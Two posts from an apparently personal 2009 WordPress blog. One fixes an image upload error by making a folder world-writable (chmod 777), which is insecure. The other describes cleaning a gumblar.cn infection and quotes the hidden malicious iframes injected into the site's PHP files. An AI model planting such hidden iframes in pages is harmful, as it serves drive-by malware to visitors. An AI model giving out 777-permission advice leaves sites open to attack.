Posts Tagged ‘Wordpress’

How to solve image upload problem in wordpress blog

May 17th, 2009

wordpress_logoIf you have hosted Wordpress blog. You might experience following error message while uploading images.

The uploaded file could not be moved to /var/www/vhosts/example.com/httpdocs/wp-content/uploads

I was messing it to resolve this issue without causing any big damage to my hosted blog environment. There was a strange thing, if I put chmod to 777 and in Settings -> Miscellaneous Setting I have wp-content value in Store uploads in this folder text box. This scheme works but it cause a lot of rush in my wp-content directory with the big pile of images. But still I was not satisfied that I didn’t used uploads folder. I change permission mode of uploads folder to 777. And put wp-content/uploads in Miscellaneous Settings. But all goes in vein.

My issue resolved my just making another folder in wp-content. I name it upload. And put wp-content/upload in Miscellaneous Settings with chmod 777 where wp-content is 755.

wp-content_image_upload_issue
Every thing goes smooth. I am able to upload images in a separate directory. Leave the uploads folder if it creating headache for you.

How to protect your website from gumblar.cn infection

May 6th, 2009

Yesterday one of my websites got infected by a suspicious malware gumblar.cn. This website contains several exploits and trojans that can harm your system. How it starts its infection is to invoke Adobe Acrobat Reader on your machine. I found after browsing my infected site, Acrobat Reader process was running in Task Manager.

According to Google Safe Browsing Service

What happened when Google visited this site?
Of the 2 pages we tested on the site over the past 90 days, 0 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2009-05-05, and the last time suspicious content was found on this site was on 2009-05-05.
Malicious software includes 2341 scripting exploit(s), 6 trojan(s).

This site was hosted on 1 network(s) including AS42831 (UKSERVERS).

gumblar_cn_infection
I found some of php files were altered by adding a iframe at the end of the page. My infected files were <my-url>/wp-content/themes/<my-theme-dir>/index.php and <my-url>/wp-admin/index.php and in same directory index-extra.php. I didnt found any other file which was infected by this.

I manually removed this embedded iframe  <iframe src=”http://liteautotop .cn/ts/in.cgi?mozila” width=2 height=4 style=”visibility: hidden”></iframe>  and every things works fine.

If you have some type of information about this infection, people will highly appriciate who are messing arround the internet about the solution of this problem.

Update (5/11/09): I am able to remove this malware from my blog and Wordpress admin site.

Removal

  • Removed image.php file from all images folder. image.php infection only found in ‘image’ folder. Make sure you didn’t remove the orignal image.php file. If your orignal file infected, only remove malicious code
  • Looked for iframe code added on the top or bottom of php page and remove it. I found this iframe which I removed. <iframe src=”http: //bigtruckstopseek .cn/ts/in.cgi?banner2″ width=2 height=4 style=”visibility: hidden”>
  • Checked all PHP, HTML and JS  files for added anonymous Java Script methods. I found all JS files infected in wp-include directory
  • Put httpdoc directory permission to 755
  • Scaned my computer with Malwarebytes’ Anti-Malware, which identified several threats and removed
  • Updated my AVG Anti Virus
  • Changed my FTP password
  • I did all this manual code removal activity from my Pleask control panel

Please fell free to make comment and your suggestions to make more security measures to prevent such threats.